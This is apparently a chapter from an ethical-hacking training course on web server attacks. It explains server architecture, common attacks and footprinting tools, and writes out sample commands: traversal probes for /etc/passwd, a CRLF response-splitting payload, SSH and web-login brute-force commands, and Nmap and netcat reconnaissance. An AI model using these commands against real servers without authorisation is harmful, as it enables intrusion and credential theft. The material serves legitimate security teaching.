Hacking Web Servers

 






Module Objectives

Most organizations consider their web presence to be an extension of themselves. Organizations create their web presence on the World Wide Web using websites associated with their business. Web servers are a critical component of a web infrastructure. A single vulnerability in web server configuration may lead to a security breach on websites. This makes web server security critical to the normal functioning of an organization.

This module starts with an overview of web server concepts. It provides an insight into various web server attacks, attack methodologies, and attack tools. Later, the module describes countermeasures against web server attacks, patch management, and security tools. The module ends with an overview of pen testing steps an ethical hacker should follow to perform the security assessment of the target.

At the end of this module, you will be able to perform the following:

■    Describe the web server concepts

■    Perform various web server attacks

■    Describe the web server attack methodology

■    Use different web server attack tools

■   Apply web server attack countermeasures

■    Describe the patch management concepts

■    Use different web server security tools

■    Perform web server penetration testing

Web Server Concepts

To understand web server hacking, you should first understand web server concepts such as what a web server is, how it functions, and the other elements associated with it.

This section gives a brief overview of the web server and its architecture. It also explains the common mistakes that allow attackers to hack a web server successfully, and describes the impact of attacks on web servers.

Web Server Operations

A web server is a computer system that stores, processes, and delivers web pages to clients worldwide via the HTTP protocol. In general, a client initiates the communication process through HTTP requests. When a client wants to access a resource such as a web page, photo, or video, the client's browser generates an HTTP request to the web server. Depending on the request, the web server collects the requested information/content from data storage or from the application servers and responds to the client's request with an appropriate HTTP response. If the web server cannot find the requested information, it generates an error message.
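As a quick, hedged illustration of this request/response cycle, the following commands (a minimal sketch; www.example.com is a placeholder host, not taken from this module) use curl to make the raw HTTP exchange visible:

# -v (verbose) prints the outgoing request lines (GET /index.html HTTP/1.1 ...)
# and the incoming response lines (HTTP/1.1 200 OK ...), showing the
# client-initiated exchange described above
curl -v http://www.example.com/index.html

# Requesting a resource the server cannot find returns an error response
# such as HTTP/1.1 404 Not Found
curl -i http://www.example.com/no-such-page.html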

Components of a Web Server

A web server consists of the following components:

■ Document Root

The document root is the web server's root file directory that stores the HTML files for the web pages of a domain name, which the server delivers in response to requests.

For example, if the requested URL is www.certifiedhacker.com and the document root is named certroot and stored in the /admin/web directory, then /admin/web/certroot is the document directory address.

If the complete request is www.certifiedhacker.com/P-folio/index.html, the server will search for the file path /admin/web/certroot/P-folio/index.html.

■   Server Root

It is the top-level root directory under the directory tree in which the server's configuration, error, executable, and log files are stored. The server root, in general, contains the code that implements the server along with three subdirectories, namely conf, logs, and cgi-bin, used to store configuration information, logs, and executables, respectively.

■   Virtual Document Tree

A virtual document tree provides storage on a different machine or disk after the original disk is filled up. It is case sensitive and can be used to provide object-level security.

■   Virtual Hosting

It is a technique of hosting multiple domains or websites on the same server. This allows sharing of resources between various servers. It is employed in large-scale companies where the company resources are intended to be accessed and managed globally.

Following are the types of virtual hosting:

o Name-based hosting

o IP-based hosting

o Port-based hosting

■ Web Proxy

A proxy server sits between the web client and the web server. Because of this placement, all requests from clients pass to the web server through the web proxy. Proxies are used to prevent IP blocking and maintain anonymity.
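As a minimal sketch of this placement (the proxy address 10.0.0.5:8080 and the target host are hypothetical), a client can route a request through a web proxy from the command line:

# Send the request via the proxy at 10.0.0.5:8080; the web server sees the
# request arriving from the proxy rather than from the client, which is how
# proxies help evade IP blocking and maintain anonymity
curl -x http://10.0.0.5:8080 http://www.example.com/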


Open-source Web Server Architecture

Open-source web server architecture typically uses Linux, Apache, MySQL, and PHP (LAMP) as principal components.

Following are the functions of the principal components in open-source web server architecture:

■    Linux is the server's OS and provides a secure platform for the web server

■    Apache is the web server component that handles each HTTP request and response

■    MySQL is a relational database used to store the web server's content and configuration information

■    PHP is the application layer technology used to generate dynamic web content


IIS Web Server Architecture

Internet Information Services (IIS) is a web server application developed by Microsoft for Windows. IIS for Windows Server is a flexible, secure, and easy-to-manage web server for hosting anything on the web. It supports HTTP, HTTPS, FTP, FTPS, SMTP, and NNTP.

It has several components, including a protocol listener such as HTTP.sys and services such as World Wide Web Publishing Service (WWW Service) and Windows Process Activation Service (WAS). Each component functions in application and web server roles. These functions may include listening to requests, managing processes, reading configuration files, and so on.


Web Server Security Issues

A web server is a hardware/software application that hosts websites and makes them accessible over the Internet. A web server, together with a browser, implements the client-server model, in which the web server plays the server part and the browser acts as the client. To host websites, a web server stores the websites' web pages and delivers a particular page upon request. Each web server has a domain name and an IP address associated with that domain name. A web server can host more than one website. Any computer can act as a web server if it has web server software installed and is connected to the Internet.

Web servers are chosen based on their capability to handle server-side programming, their security characteristics, and their publishing, search engine, and site-building tools. Apache, Microsoft IIS, Nginx, Google, and Tomcat are some of the most widely used web servers. An attacker usually targets vulnerabilities in software components and configuration errors to compromise web servers.

Organizations can defend against most network-level and OS-level attacks by using network security measures such as firewalls, IDS, and IPS and by following security standards and guidelines. This forces attackers to turn their attention to web server and web application-level attacks, as a web server hosting web applications is accessible from anywhere over the Internet. This makes web servers an attractive target. A poorly configured web server can punch a hole in the most carefully designed firewall system. Attackers can exploit a poorly configured web server with known vulnerabilities to compromise the security of the web applications it hosts. A leaky server can harm an organization.

Common Goals behind Web Server Hacking

Attackers perform web server attacks with certain goals in mind. These goals may be either technical or non-technical. For example, attackers may breach the security of a web server and steal sensitive information for financial gain or merely out of curiosity.

Following are some goals behind a web server attack:

■    Stealing credit cards or other sensitive credentials using phishing techniques

■    Integrating the server into a botnet in order to perform Denial of Service (DoS) or Distributed Denial of Service (DDoS) attacks

 ■    Compromising a database

■    Obtaining closed-source applications 

■    Hiding and redirecting traffic

■    Escalating privileges

Some attacks are not made to attain financial gains, but for personal reasons:

■    For the sake of pure curiosity

■    For the sake of achieving a self-set intellectual challenge

 ■   To damage the target organization's reputation

Dangerous Security Flaws Affecting Web Server Security

Web server configuration by poorly trained system administrators may leave security vulnerabilities in the web server. Inadequate knowledge, negligence, laziness, and inattentiveness toward security can pose the biggest threats to web server security. Following are some of the common oversights that make a web server vulnerable to attacks:

■    Not updating the web server with the latest patches

 ■    Using the same sys admin credentials everywhere 

■   Allowing unrestricted internal and outbound traffic

 ■    Running unhardened applications and servers 

■    Complacency

Why Are Web Servers Compromised?

There are inherent security risks associated with the web servers, the local area networks that host websites, and the end-users who access these websites using browsers.

■ Webmaster's Concern: From a webmaster's perspective, the biggest security concern is that the web server can expose the local area network (LAN) or the corporate intranet to the threats the Internet poses. These may be in the form of viruses, Trojans, attackers, or the compromise of information itself. Bugs in software programs are often a source of security lapses, and web servers, being large and complex programs, come with these inherent risks. In addition, the open architecture of web servers allows arbitrary scripts to run on the server side while replying to remote requests. Any CGI script installed at the site may contain bugs that are potential security holes.

■ Network Administrator's Concern: From a network administrator's perspective, a poorly configured web server poses another potential hole in the local network's security. While the objective of a web server is to provide controlled access to the network, too much control can make a web server almost impossible to use. In an intranet environment, the network administrator has to configure the web server carefully so that legitimate users are recognized and authenticated and groups of users are assigned distinct access privileges.

■ End User's Concern: Usually, the end user does not perceive any immediate threat, as surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, makes it possible for harmful applications, such as viruses, to invade the user's system. In addition, active content delivered from a website to the browser can be a conduit for malicious software to bypass the firewall system and permeate the LAN.

Following are some of the methods to compromise a web server: 

■    Improper file and directory permissions

■    Installing the server with default settings

■    Unnecessary services enabled, including content management and remote administration

■   Security conflicts with business ease-of-use case

■    Lack of proper security policy, procedures, and maintenance

■    Improper authentication with external systems

■    Default accounts with their default or no passwords

■    Unnecessary default, backup, or sample files

■    Misconfigurations in web server, OS, and networks

■    Bugs in server software, OS, and web applications

■    Misconfigured SSL certificates and encryption settings

■ Administrative or debugging functions that are enabled or accessible on web servers

■    Use of self-signed certificates and default certificates

Impact of Web Server Attacks

Attackers can  cause various kinds of damages  to  an organization by attacking a web server. Following are some of the damages attackers can cause to a web server:

■ Compromise of user accounts: Web server attacks mostly concentrate on compromising user accounts. If the attacker compromises a user account, the attacker can gain a lot of useful information and can use the compromised account to launch further attacks on the web server.

■ Website defacement: Attackers completely change the appearance of the website by replacing the original data. They change the website's look by changing the visuals and displaying different pages with messages of their own.

■    Secondary attacks from the website: An attacker who compromises a web server can use the server to launch further attacks on various websites or client systems.

■ Root access to other applications or server: Root access is the highest privilege one gets to log in to a network, be it a dedicated server, semi-dedicated, or virtual private server. Attackers can perform any action once they get root access to the server.

■    Data tampering: An attacker can alter or delete the data and can even replace the data with malware in order to compromise whoever connects to the web server.

■ Data theft: Data is one of the primary assets of an organization. Attackers can get access to sensitive data such as financial records, future plans, or the source code of a program.


Web Server Attacks

An attacker can use many techniques to compromise a web server such as DoS/DDoS, DNS server hijacking, DNS amplification, directory traversal, Man-in-the-Middle (MITM)/sniffing, phishing, website defacement, web server misconfiguration, HTTP response splitting, web cache poisoning, SSH brute force, web server password cracking, and so on. This section describes these possible attacks in detail.


DoS/DDoS Attacks

A DoS/DDoS attack involves flooding a target with numerous fake requests so that the target stops functioning and becomes unavailable to legitimate users. Using a web server DoS/DDoS attack, an attacker attempts to take the web server down or make it unavailable to legitimate users. A web server DoS/DDoS attack often targets high-profile web servers such as those of banks and credit card payment gateways, and even root name servers.

To crash the web server running the application, the attacker targets the following resources, consuming them with fake requests:


■ Network bandwidth

■ Server memory

■ Application exception handling mechanism

■ CPU usage

■ Hard disk space 

■ Database space


DNS Server Hijacking

Domain Name System (DNS) resolves a domain name to its corresponding IP address. A user queries the DNS server with a domain name, and it delivers the corresponding IP address.

In a DNS server hijacking attack, an attacker compromises the DNS server and changes the mapping settings of the target DNS server to point to a rogue DNS server so that it redirects the user's requests to the attacker's rogue server. Thus, when the user types a legitimate URL in a browser, the settings redirect the request to the attacker's fake site.

DNS Amplification Attack

A recursive DNS query is a method of requesting DNS mapping. The query passes through domain name servers recursively until the specified domain-name-to-IP-address mapping is found or the lookup fails.


Following are the steps involved in processing a recursive DNS request:

■   Step 1:

Users who want to resolve the IP address for a specific domain send a DNS query to the primary DNS server specified in its TCP/IP properties.

■   Steps 2 to 7:

If the requested DNS mapping is not present on the user's primary DNS server, the server forwards the request to the root server. The root server forwards the request to the .com namespace, where the DNS mapping may be found. This process repeats recursively until the DNS mapping is resolved.

■   Step 8:

Ultimately, when the system finds the primary DNS server for the requested DNS mapping, it generates a cache for the IP address in the user's primary DNS server.

Attackers exploit recursive DNS queries to perform a DNS amplification attack that results in DDoS attacks on the victim's DNS server.

Following are the steps involved in DNS amplification attack:

■   Step 1:

The attacker instructs compromised hosts (bots) to make DNS queries in the network.

■   Step 2:

All the compromised hosts spoof the victim's IP address and send DNS query requests to the victim's primary DNS server configured in its TCP/IP settings.

■   Steps 3 to 8:

If the requested DNS mapping is not present on the victim's primary DNS server, the server forwards the requests to the root server. The root server will forward the request to .com or respective TLD namespaces. This process repeats recursively until the victim's primary DNS server resolves the DNS mapping request.

■ Step 9:

After the primary DNS server finds the DNS mapping for the victim's request, it sends a DNS mapping response to the victim's IP address. This response goes to the victim as bots are using the victim's IP address. The replies to a large number of DNS mapping requests from the bots result in DDoS on the victim's DNS server.
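The amplification effect itself can be observed with an ordinary dig query: a DNS request is only tens of bytes, while an answer for a record type such as ANY can run to thousands of bytes. The sketch below is illustrative only (203.0.113.53 stands in for a hypothetical open recursive resolver):

# A small UDP query can trigger a response many times its size; in the
# attack, bots send such queries with the victim's spoofed source address,
# so the oversized replies flood the victim instead of the sender
dig ANY example.com @203.0.113.53 +notcp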

Directory Traversal Attacks

An attacker may be able to perform a directory traversal attack due to a vulnerability present in the code of the web application. In addition to this, poorly patched or configured web server software can make the web server itself vulnerable to a directory traversal attack.

The design of web servers limits public access to some extent. Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL. In directory traversal attacks, attackers use ../ (dot-dot-slash) sequence to access restricted directories outside of the web server's root directory. Attackers can use the trial-and-error method to navigate outside of the root directory and access sensitive information in the system.

An attacker exploits the software (web server program) on the web server to perform directory traversal attacks. The attacker usually performs this attack with the help of a browser. A web server is vulnerable to this attack if it accepts input data from a browser without proper validation.
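A minimal sketch of such a probe from the command line (the host and the vulnerable page parameter are hypothetical; the number of ../ sequences is found by trial and error, as described above):

# Attempt to step out of the document root and read /etc/passwd
curl "http://www.example.com/view?page=../../../../etc/passwd"

# Some servers filter the literal sequence but decode %2e%2e%2f, so
# URL-encoded variants are also tried
curl "http://www.example.com/view?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"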

Man-in-the-Middle/Sniffing Attack

Man-in-the-Middle (MITM) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end-user and web servers. In an MITM attack or sniffing attack, an intruder intercepts or modifies the messages exchanged between the user and web server through eavesdropping or intruding into a connection. This allows an attacker to steal sensitive user information such as online banking details, usernames, passwords, and so on, transferred over the Internet to the web server. The attacker lures the victim to connect to the web server by pretending to be a proxy. If the victim believes and agrees to the attacker's request, then all the communication between the user and the web server passes through the attacker. In this way, the attacker can steal sensitive user information.


Phishing Attacks

Attackers perform a phishing attack by sending an email containing a malicious link and tricking the user into clicking it. Clicking the link redirects the user to a fake website that looks similar to the legitimate one; attackers host such fake websites on their own web servers. When a victim clicks the malicious link believing it to be a legitimate website address, it redirects to the malicious website hosted on the attacker's server. The website prompts the user to enter sensitive information such as usernames, passwords, financial account information, and social security numbers, and divulges the data to the attacker. Later, the attacker may establish a session with the legitimate website using the victim's stolen credentials in order to perform malicious operations on the target website.

Website Defacement

Website defacement refers to the unauthorized changes made to the content of a single web page or an entire website, resulting in changes to the visual appearance of the website or a web page. Hackers break into web servers and alter the hosted website by injecting code in order to add images, popups, or text to a page in such a way that the visual appearance of the page changes. In some cases, the attacker may replace the entire website instead of just changing single pages.

Defaced pages expose visitors to propaganda or misleading information until the unauthorized changes are discovered and corrected. Attackers use a variety of methods, such as MySQL injection, to access a website in order to deface it. In addition to changing the visual appearance of the target website, attackers deface websites to infect the computers of visitors, making the website a conduit for virus attacks. Thus, website defacement not only embarrasses the target organization by changing the appearance of its website but is also intended to harm its visitors.


Web Server Misconfiguration

Web server misconfiguration refers to the configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers such as directory traversal, server intrusion, and data theft.

Following are some of the web server misconfigurations:

■    Verbose Debug/Error Messages

■    Anonymous or Default Users/Passwords

■    Sample Configuration and Script Files

■    Remote Administration Functions

■    Unnecessary Services Enabled

■    Misconfigured/Default SSL Certificates

An Example of a Web Server Misconfiguration

"Keeping the server configuration secure requires vigilance"—OWASP

Administrators who configure web servers improperly may leave serious loopholes in the web server, thereby giving an attacker the chance to exploit the misconfigured web server to compromise its security and obtain sensitive information. The vulnerabilities of improperly configured web servers may be related to configuration, applications, files, scripts, or web pages. An attacker looks for such vulnerable web servers to launch attacks. The misconfiguration of a web server gives the attacker a path to enter the target network of an organization. These loopholes can also help an attacker to bypass user authentication. Once detected, these problems can be easily exploited and result in the total compromise of a website hosted on the target web server.

The figure below shows a configuration that allows anyone to view the server status page, which contains detailed information about the current use of the web server, including information about the current hosts and requests being processed.

<Location /server-status>
    SetHandler server-status
</Location>

FIGURE 13.2: Screenshot displaying httpd.conf file on an Apache server
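Whether this status page is exposed can be checked with a single request; a sketch assuming a hypothetical target:

# If the misconfiguration above is present, this returns the live status
# page (current hosts and requests); a hardened server returns 403 Forbidden
curl -i http://www.example.com/server-status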

The figure below shows a configuration that gives verbose error messages.

display_errors = On
log_errors = On
error_log = syslog
ignore_repeated_errors = Off

FIGURE 13.3: Screenshot displaying php.ini file


HTTP Response-Splitting Attack

An HTTP response-splitting attack is a web-based attack in which the attacker tricks the server by injecting new lines into response headers, along with arbitrary code. It involves adding header response data to the input field so that the server splits the response into two responses. This type of attack exploits vulnerabilities in input validation; Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and SQL injection are other examples of attacks that exploit such vulnerabilities. In this attack, the attacker controls the input parameter and cleverly constructs a request header that causes two responses from the server. The attacker alters a single request to appear as two requests by adding header response data to the input field; the web server in turn responds to each request. The attacker can pass malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the web browser will discard the other responses.

Example of an HTTP Response-Splitting Attack

In this example, the attacker sends a response-splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. After receiving the response from web server, the victim requests service by providing credentials. At the same time, the attacker requests the index page. Then the web server sends the response to the victim's request to the attacker and the victim remains uninformed.
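A hedged sketch of the injected input follows (the redirect endpoint and its page parameter are hypothetical; %0d%0a is the URL-encoded CRLF that terminates a header line):

# If the application copies 'page' into a response header without stripping
# CR/LF, the injected %0d%0a sequences close the first response early and
# supply a complete, attacker-controlled second response ("Hacked", 6 bytes)
curl "http://www.example.com/redirect?page=home%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%206%0d%0a%0d%0aHacked"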


Web Cache Poisoning Attack

Web cache poisoning attacks the reliability of an intermediate web cache source. In this attack, the attackers swap cached content for a random URL with infected content. Users of the web cache source can unknowingly use the poisoned content instead of true and secured content when requesting the required URL through the web cache.

An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request that will be stored in the cache. In this case, all users of that web server cache will receive malicious content until the server flushes the web cache. Web cache poisoning attacks are possible if the web server and application have HTTP response-splitting flaws.


SSH Brute Force Attack

Attackers use the SSH protocol to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network. SSH usually runs on TCP port 22. To conduct an attack on SSH, the attacker scans for SSH servers using bots (performing a port scan on TCP port 22) to identify possible vulnerabilities. With the help of a brute force attack, the attacker gains the login credentials needed to obtain unauthorized access to an SSH tunnel. An attacker who gains the login credentials of SSH can use the same SSH tunnels to transmit malware and other exploits to victims without being detected. Attackers use tools such as Nmap and Ncrack on a Linux platform to perform an SSH brute force attack.
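Since Nmap is mentioned above, one way to sketch such an attack is with Nmap's ssh-brute NSE script (the target address and the wordlist file names are hypothetical):

# Brute-force SSH logins on TCP port 22 using candidate username and
# password lists; successful credentials are reported in the script output
nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst 10.10.10.5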


Web Server Password Cracking

An attacker tries to exploit weaknesses to hack well-chosen passwords. The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, and so on.

Attackers mainly target the following:

■   SMTP and FTP servers

■   Web shares

■   SSH tunnels

■   Web form authentication cracking

Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan horse or virus, wiretapping, keystroke logging, and so on. Many hacking attempts start with cracking a password in order to prove to the web server that the attacker is a valid user.

Web Server Password Cracking Techniques

Cracking a password is the most common method of gaining unauthorized access to the web server by exploiting its flawed and weak authentication mechanism. Once the password is cracked, an attacker can use those passwords to launch further attacks.

Attackers can use the following password cracking techniques to extract passwords from web servers, FTP servers, SMTP servers, and so on. Let us get into the details of various password cracking tools and techniques used by the attacker to crack passwords. Attackers can crack passwords either manually or with automated tools such as Cain & Abel, Brutus, THC Hydra, and so on.


■ Guessing: This is the most common method of cracking passwords, in which the attacker guesses possible passwords either manually or by using automated tools provided with dictionaries. Most people tend to use their pets' names, loved ones' names, license plate numbers, dates of birth, or other weak passwords such as "QWERTY," "password," or "admin" so that they can remember them easily. The attacker exploits this human tendency to keep things simple in order to crack passwords.

■ Dictionary Attack: A dictionary attack uses a predefined file of words in various combinations, and an automated program tries entering these words one at a time to see if any of them is the password. This might not be effective if the password includes special characters and symbols, but if the password is a simple word, it can be found quickly. Compared to a brute force attack, a dictionary attack is less time-consuming.

■ Brute Force Attack: In the brute force method, all possible characters are tested, for example, uppercase from A to Z, numbers from 0 to 9, and lowercase from a to z. This method is useful to identify one-word or two-word passwords. If a password consists of uppercase and lowercase letters and special characters, it might take months or years to crack the password using a brute force attack.

■ Hybrid Attack: A hybrid attack is more powerful as it uses both a dictionary attack and brute force attack. It also uses symbols and numbers. Password cracking becomes easier with this method.
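As a hedged sketch of automating these techniques with THC Hydra, one of the tools named above (the target, form path, field names, and failure string are all hypothetical):

# Dictionary attack against a web login form: Hydra substitutes ^USER^ and
# ^PASS^ from -l/-P; the final field is the text shown on a failed login
hydra -l admin -P wordlist.txt www.example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"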


Web Application Attacks

Even if web servers are configured securely or are secured using network security measures such as firewalls, a poorly coded web application deployed on the web server may give a path to an attacker to compromise the web server's security. If the web developers do not adopt secure coding practices while developing web applications, it may give attackers the chance to exploit vulnerabilities and compromise web applications and web server security. An attacker can perform different types of attacks on vulnerable web applications to breach web server security.

■ Parameter/Form Tampering: In this type of tampering attack, the attacker manipulates the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, and so on.

■ Cookie Tampering: Cookie tampering attacks occur when a cookie is sent from the client side to the server. Different types of tools help in modifying persistent and non-persistent cookies.

■ Unvalidated Input and File Injection Attacks: Unvalidated input and file injection attacks are performed by supplying an unvalidated input or by injecting files into a web application.

■ SQL Injection Attacks: SQL injection exploits the security vulnerabilities of a database for attacks. The attacker injects malicious code into the strings that are later passed on to the SQL server for execution.

■ Session Hijacking: Session hijacking is an attack in which the attacker exploits, steals, predicts, and negotiates the real valid web session's control mechanism to access the authenticated parts of a web application.


■ Directory Traversal: Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL.

■    Denial-of-Service (DoS) Attack: A DoS attack is intended to terminate the operations of a website or a server and make it unavailable for access by intended users.

■ Cross-Site Scripting (XSS) Attacks: In this method, an attacker injects HTML tags or scripts into a target website.

■ Buffer Overflow Attacks: The design of most web applications helps them in sustaining some amount of data. If that amount exceeds the storage space available, the application may crash or may exhibit some other vulnerable behavior. The attacker uses this advantage and floods the application with too much data, which in turn causes a buffer overflow attack.

■ Cross-Site Request Forgery (CSRF) Attack: An attacker exploits the trust of an authenticated user to pass malicious code or commands to the web server.

■ Command Injection Attacks: In this type of attack, a hacker alters the content of the web page by using HTML code and by identifying form fields that lack valid constraints.

■ Source Code Disclosure: Source code disclosure is a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. This disclosure can sometimes allow the attackers to gain sensitive information about database credentials and secret keys and compromise the web servers.


Web Server Attack Methodology

The previous section described attacks that an attacker can perform to compromise a web server's security. This section explains exactly how the attacker proceeds in performing a successful attack on a web server. A web server attack typically involves preplanned activities, collectively called an attack methodology, that an attacker follows to reach the goal of breaching the target web server's security.


Attackers hack a web server in multiple stages. At each stage, the attacker tries to gather more information about the loopholes and tries to gain unauthorized access to the web server. Following are the stages of the web server attack methodology:

■    Information Gathering

Every attacker tries to collect as much information as possible about the target web server. The attacker gathers the information and then analyzes the information in order to find lapses in the current security mechanism of the web server.

■    Web Server Footprinting

The purpose of footprinting is to gather more information about security aspects of a web server with the help of tools or footprinting techniques. The main purpose is to know about the web server's remote access capabilities, its ports and services, and other aspects of its security.

■    Website Mirroring

Website mirroring is a method of copying a website and its content onto another server for offline browsing. With a mirrored website, an attacker can view the detailed structure of the website.

■   Vulnerability Scanning

Vulnerability scanning is a method to find vulnerabilities and misconfigurations of a web server. Attackers scan for vulnerabilities with the help of automated tools known as vulnerability scanners.

■    Session Hijacking

Attackers can perform session hijacking after identifying the current session of the client. The attacker takes over complete control of the user session by means of session hijacking.

■    Web Server Passwords Hacking

Attackers use password-cracking methods such as brute force attacks, hybrid attacks, dictionary attacks, and so on, to crack the web server's password.


Information Gathering

Information gathering is the first and one of the most important steps toward hacking a target web server. An attacker collects as much information as possible about the target server by using various tools and techniques. The information obtained in this step helps the attacker assess the security posture of the web server. Attackers may search the Internet, newsgroups, bulletin boards, and so on for information about the target organization. The following tools help the attacker extract information such as the target's domain name, IP address, and autonomous system number.

■   WHOis

Source: https://www.whois.net

WHOis.net is designed to help you perform a variety of whois lookup functions. It lets you perform a domain whois search, whois IP lookup, and search the whois database for relevant information on domain registration and availability. This can help provide insight into a domain's history and additional information. Use whois lookup anytime you want to perform a search to see who owns a domain name, how many pages from a site are listed with Google, or even search whois address listings for a website's owner.

Following are some of the additional information-gathering tools:

■   Whois Lookup (http://whois.domaintools.com)

■   Whois (https://www.whois.com)

■   DNSstuff Toolbox (http://www.dnsstuff.com)

■   Domain Dossier (http://centralops.net)

■   Find Subdomains (https://pentest-tools.com)

■   Whois Online (http://whois.online-domain-tools.com)

■   SmartWhois (http://www.tamos.com)

■   Whois Lookup Multiple Addresses Software (https://www.sobolsoft.com)

Note: For complete coverage of information-gathering techniques, refer to Module 02: Footprinting and Reconnaissance.


Information Gathering from Robots.txt File

A website owner creates a robots.txt file to tell web crawlers which files or directories on the site they may index in search results. Poorly written robots.txt files can cause complete indexing of website files and directories. In this case, an attacker may easily obtain information such as passwords, email addresses, hidden links, and membership areas if confidential files and directories have been indexed in the search results.

If the owner of the target website writes the robots.txt file and does not allow indexing of restricted pages in the search results, an attacker can still easily view the robots.txt file of that site to discover restricted files, and then view them to gather information.

An attacker types <URL>/robots.txt in the address bar of a browser to view the target website's robots.txt file. An attacker can also download the robots.txt file of a target website using the Wget tool.
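For example, either of the following retrieves a target's robots.txt (reusing this module's example domain), whose Disallow entries reveal the paths the owner wanted kept out of search results:

# Download the file with Wget, or just print it with curl
wget http://www.certifiedhacker.com/robots.txt
curl http://www.certifiedhacker.com/robots.txt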


Web Server Footprinting/Banner Grabbing

By performing web server footprinting, you can gather valuable system-level data such as account details, OS, software versions, server names, and database schema details. Use the Telnet utility to footprint a web server and gather information such as server name, server type, operating system, and applications running. Use footprinting tools such as Netcraft, ID Serve, and httprecon to perform web server footprinting; these tools can extract information from the target server. Let us look at the features and the type of information these tools are able to collect from the target server.


Web Server Footprinting Tools

■ Netcat

Source: http://netcat.sourceforge.net

Netcat is a networking utility that reads and writes data across network connections, using the TCP/IP protocol. It is a reliable "back-end" tool used directly or driven by other programs and scripts. It is also a network debugging and exploration tool.

o Outbound and inbound connections, TCP or UDP, to or from any ports

o Tunneling mode, which allows special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface), and the remote host allowed to connect to the tunnel

o Built-in port-scanning capabilities with randomizer

o Usage options, such as buffered send-mode (one line every N seconds) and hexdump (to stderr or to a specified file) of transmitted and received data

o Optional RFC854 telnet codes parser and responder

Discussed below are the commands used to perform banner grabbing (e.g., against www.moviescope.com) to gather information such as server type and version:

o # nc -vv www.moviescope.com 80 and press [Enter]

o GET / HTTP/1.0 and press [Enter] twice

■   Telnet

Source: https://technet.microsoft.com

Telnet is a network protocol widely used on the Internet and on LANs. It is a client-server protocol that provides login sessions for a user on the Internet. Telnet emulates a single terminal attached to another computer. The primary security problems with Telnet are the following:

o It does not encrypt any data sent through the connection.

o It lacks an authentication scheme.

Telnet helps the user perform a banner-grabbing attack. It probes HTTP servers to determine the Server field in the HTTP response header.

For instance, to enumerate a host running on http (TCP 80), follow the procedure given below:

o Request telnet to connect to a host on a specific port: C:\>telnet www.moviescope.com 80 and press Enter. A blank screen appears.

o Type GET / HTTP/1.0 and press Enter twice.

The HTTP server responds with the information (see the screenshot in the slide).

■    Netcraft

Source: https://www.netcraft.com

Netcraft determines the OS of the queried host by looking in detail at the network characteristics of the HTTP response received from the website. Netcraft identifies vulnerabilities in the web server via indirect methods: fingerprinting the OS, the software installed, and the configuration of that software gives enough information to determine whether the server may be vulnerable to an exploit.

■ httprecon

Source: http://www.computec.ch

httprecon is a tool for advanced web server fingerprinting. It performs banner-grabbing attacks, status code enumeration, and header ordering analysis on the target web server, and provides accurate web server fingerprinting information.

httprecon performs the following header analysis test cases on the target web server:

o legitimate GET request for an existing resource

o very long GET request (>1024 bytes in URI)

o common GET request for a non-existing resource

o common HEAD request for an existing resource

o allowed method enumeration with OPTIONS

o usually not permitted HTTP method DELETE

o not defined HTTP method TEST

o non-existing protocol version HTTP/9.8

o GET request including attack patterns (e.g., ../ and %%)

■ ID Serve

Source: https://www.grc.com

ID Serve is a simple Internet server identification utility. Following is a list of its capabilities:

o HTTP Server Identification: ID Serve can identify the make, model, and version of a website's server software. Servers send this information in the preamble of replies to web queries, but it is not normally visible to the user; ID Serve extracts and reports it.

o Non-HTTP Server Identification: Most non-HTTP (non-web) Internet servers (e.g., FTP, SMTP, POP, and NEWS) are required to transmit a line containing a numeric status code and a human-readable greeting to any connecting client. Therefore, ID Serve can also connect with non-web servers to receive and report the server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information.

o Reverse DNS Lookup: When ID Serve users enter a site's or server's domain name or URL, the application uses DNS to determine the IP address for that domain. However, sometimes it is useful to go in the other direction and determine the domain name associated with a known IP address. This process, known as reverse DNS lookup, is also built into ID Serve. ID Serve will attempt to determine the associated domain name for any entered IP address.


Following are some of the additional footprinting tools:

■    Recon-ng (https://bitbucket.org)

■    Uniscan (https://sourceforge.net)

■   SpiderFoot (http://www.spiderfoot.net)

■    httprint (http://www.net-square.com)

■    Nmap (https://nmap.org)

■   ScanLine (https://www.mcafee.com)

■   Xprobe (https://sourceforge.net)

■    p0f (https://github.com)

■   Satori (http://chatteronthewire.org)

■   Thanos (https://github.com)

■    Bannergrab (https://sourceforge.net)

■    synscan (http://synscan.sourceforge.net)

■    Disco (http://www.altmode.com)

■    Winfingerprint (http://qpdownload.com)

■    NetworkMiner (http://www.netresec.com)


Enumerating Web Server Information Using Nmap

Source: https://nmap.org

Nmap, along with the Nmap Scripting Engine, can extract a lot of valuable information from the target web server. In addition to Nmap commands, the Nmap Scripting Engine (NSE) provides scripts that reveal all sorts of useful information about the target web server to an attacker.

An attacker uses the following Nmap commands and NSE scripts to extract information:

■    Discover virtual domains with hostmap

$nmap --script hostmap <host>

■    Detect a vulnerable server that uses the TRACE method

$nmap --script http-trace -p80 localhost

■ Harvest email accounts with http-google-email

$nmap --script http-google-email <host>

■    Enumerate users with http-userdir-enum

$nmap -p80 --script http-userdir-enum localhost

■    Detect HTTP TRACE

$nmap -p80 --script http-trace <host>

■   Check if the web server is protected by a WAF/IPS

$nmap -p80 --script http-waf-detect <host>

■    Enumerate common web applications

$nmap --script http-enum -p80 <host>

